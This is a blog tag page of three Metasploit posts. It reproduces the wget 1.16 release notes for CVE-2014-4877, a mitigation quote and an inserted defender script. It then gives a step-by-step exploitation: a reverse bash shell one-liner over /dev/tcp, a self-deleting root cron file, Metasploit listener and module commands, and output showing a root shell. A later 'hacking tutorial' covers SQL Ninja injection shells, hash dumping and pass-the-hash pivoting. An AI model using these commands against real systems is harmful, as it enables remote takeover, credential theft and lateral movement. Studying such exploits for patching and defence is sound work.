17 posts tagged 'metasploit'

  1. 2014.10.31 Wget FTP Symlink Attack Vulnerability
  2. 2013.12.30 How to install Metasploitable 2 in Virtual Box
  3. 2012.07.24 SQL Injection with SQL Ninja and Metasploit Hacking Tutorial
2014.10.31 18:03

Wget FTP Symlink Attack Vulnerability

http://thehackernews.com/2014/10/cve-2014-4877-wget-ftp-symlink-attack.html


[Bug-wget] GNU wget 1.16 released

It is available for download here:

ftp://ftp.gnu.org/gnu/wget/wget-1.16.tar.gz
ftp://ftp.gnu.org/gnu/wget/wget-1.16.tar.xz

and the GPG detached signatures using the key E163E1EA:

ftp://ftp.gnu.org/gnu/wget/wget-1.16.tar.gz.sig
ftp://ftp.gnu.org/gnu/wget/wget-1.16.tar.xz.sig

To reduce load on the main server, you can use this redirector service
which automatically redirects you to a mirror:

http://ftpmirror.gnu.org/wget/wget-1.16.tar.gz
http://ftpmirror.gnu.org/wget/wget-1.16.tar.xz

* Noteworthy changes in Wget 1.16

** No longer create local symbolic links by default.  Closes CVE-2014-4877.

** Use libpsl for verifying cookie domains.

** Default progress bar output changed.

** Introduce --show-progress to force display the progress bar.

** Introduce --no-config.  The wgetrc files will not be read.

** Introduce --start-pos to allow starting downloads from a specified position.

** Fix a problem with ISA Server Proxy and keep-alive connections.


"In addition to changing arguments in all scripts or programs that invoke wget, it is possible to enabled[sic] retr-symlinks option via wget configuration file - either global /etc/wgetrc, or user specific ~/.wgetrc - by adding the line: retr-symlinks=on"
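An added defender-side check that follows the mitigation quoted above (this is example code, not from the advisory or from GNU wget): it parses the global and user wgetrc for the effective retr-symlinks setting, using wget's own rule that case, dashes and underscores in command names are ignored, and compares the wget version against 1.16. The version string and wgetrc contents in the main block are constructed samples.

```python
"""Added defender-side check for CVE-2014-4877 exposure (not advisory or wget code)."""
import re

FIXED_VERSION = (1, 16)  # wget 1.16 stopped creating local symlinks by default


def parse_wgetrc(text):
    """Parse wgetrc 'command = value' lines; later lines override earlier ones.
    wget ignores case, dashes and underscores in command names, so
    retr-symlinks, retr_symlinks and RetrSymlinks all map to one key."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and whitespace
        if "=" not in line:
            continue
        key, value = line.split("=", 1)
        settings[re.sub(r"[-_]", "", key.strip().lower())] = value.strip().lower()
    return settings


def retr_symlinks_enabled(global_rc, user_rc):
    """Effective retr_symlinks after global then user wgetrc; pre-1.16 default is off."""
    merged = parse_wgetrc(global_rc)
    merged.update(parse_wgetrc(user_rc))
    return merged.get("retrsymlinks", "off") in ("on", "yes", "1")


def wget_version(version_output):
    """Extract (major, minor) from the first line of `wget --version`."""
    match = re.search(r"GNU Wget (\d+)\.(\d+)", version_output)
    return (int(match.group(1)), int(match.group(2))) if match else None


def is_protected(version_output, global_rc, user_rc):
    """True when the symlink-creation path is closed by version or by configuration."""
    version = wget_version(version_output)
    fixed = version is not None and version >= FIXED_VERSION
    return fixed or retr_symlinks_enabled(global_rc, user_rc)


if __name__ == "__main__":
    # Constructed sample inputs; on a real host feed in `wget --version`,
    # /etc/wgetrc and ~/.wgetrc instead.
    old_wget = "GNU Wget 1.15 built on linux-gnu.\n"
    print(is_protected(old_wget, "# empty global rc\n", ""))                        # False
    print(is_protected(old_wget, "retr-symlinks = on\n", ""))                       # True
    print(is_protected(old_wget, "retr-symlinks = on\n", "retr_symlinks = off\n"))  # False
```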



Exploitation

We have released a Metasploit module to demonstrate this issue. In the example below, we demonstrate obtaining a reverse command shell against a user running wget as root against a malicious FTP service. This example makes use of the cron daemon and a reverse-connect bash shell. First we will create a reverse connect command string using msfpayload.

msfpayload cmd/unix/reverse_bash LHOST=192.168.0.4 LPORT=4444 R
0<&112-;exec 112<>/dev/tcp/192.168.0.4/4444;sh <&112 >&112 2>&112

Next we create a crontab file that runs once a minute, launches this command, and deletes itself:

cat>cronshell <<EOD
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
* * * * * root bash -c '0<&112-;exec 112<>/dev/tcp/192.168.0.4/4444;sh <&112 >&112 2>&112'; rm -f /etc/cron.d/cronshell
EOD

Now we start up msfconsole and configure a shell listener:

msfconsole
msf> use exploit/multi/handler
msf exploit(handler) > set PAYLOAD cmd/unix/reverse_bash
msf exploit(handler) > set LHOST 192.168.0.4
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > run -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.0.4:4444

Finally we switch to the wget module itself:

msf exploit(handler) > use auxiliary/server/wget_symlink_file_write
msf auxiliary(wget_symlink_file_write) > set TARGET_FILE /etc/cron.d/cronshell
msf auxiliary(wget_symlink_file_write) > set TARGET_DATA file:cronshell
msf auxiliary(wget_symlink_file_write) > set SRVPORT 21
msf auxiliary(wget_symlink_file_write) > run
[+] Targets should run: $ wget -m ftp://192.168.0.4:21/
[*] Server started.

At this point, we just wait for the target user to run wget -m ftp://192.168.0.4:21/

[*] 192.168.0.2:52251 Logged in with user 'anonymous' and password 'anonymous'...
[*] 192.168.0.2:52251 -> LIST -a
[*] 192.168.0.2:52251 -> CWD /1X9ftwhI7G1ENa
[*] 192.168.0.2:52251 -> LIST -a
[*] 192.168.0.2:52251 -> RETR cronshell
[+] 192.168.0.2:52251 Hopefully wrote 186 bytes to /etc/cron.d/cronshell
[*] Command shell session 1 opened (192.168.0.4:4444 -> 192.168.0.2:58498) at 2014-10-27 23:19:02 -0500

msf auxiliary(wget_symlink_file_write) > sessions -i 1
[*] Starting interaction with 1...

id
uid=0(root) gid=0(root) groups=0(root),1001(rvm)


2013.12.30 16:12

How to install Metasploitable 2 in Virtual Box



Source: https://www.facebook.com/groups/metasploit/


2012.07.24 18:12

SQL Injection with SQL Ninja and Metasploit Hacking Tutorial



In this blog I will show you a pretty sweet tool called SQL Ninja in the Metasploit Framework. There are a lot of SQL injection tools out there, but this one is my favorite because instead of extracting the actual data it focuses on getting an interactive shell on the remote DB server and using it as a foothold against the target network. So let's go ahead and dive in to the wonders of SQL Ninja.

First, all of the information we need SQL Ninja to use is stored in a config file; by default it's called sqlninja.conf. All you need to do is open the configuration file with Nano, Kate or whatever your favorite text editor in Linux is. (See below.)

As you can see from the screenshot above, I pointed out the important parts of the config file for basic SQL injections. The first arrow is the actual host address, i.e. www.domain.com; this can also be the IP address of the server.

The second arrow is the port that we will try to exploit on; 443 is the default for SQL, so just leave it as 443. Make all the changes needed to the config file and save it.

Now type "cd /pentest/database/sqlninja" without quotes and hit enter; this will load up the SQL Ninja tool. After that, type "./sqlninja -f config.conf -m m" without quotes; this is going to parse the config file into SQL Ninja and also start up a Metasploit module at the same time.

After you do this it's going to take a while, because SQL Ninja is actually pushing SQL queries via the initial SQL injection. So it has to go through several queries, wait for the responses from the SQL server and then check those results. I would advise grabbing a rum and coke while you wait :) When it's done you will get a screen like the one below:

This has created a local shell on the SQL box; from here you can use your Metasploit meterpreter session. This is pretty awesome because a SQL server is usually a high maintenance server, so it's likely the admin has logged in recently. We can do something like a hashdump or grab the tokens off the local SQL server; once we have the hashes of all the accounts (Admin included) we can use the hash to pivot from the SQL server into the domain controller. This technique is known as "Pass The Hash" and works if the admin uses the same password for all his logins to Windows servers.

Final note: the best lab for this is a virtual environment; I like to use VMware Workstation to run all the different boxes needed for the demos.



Source: http://www.elithecomputerguy.com/


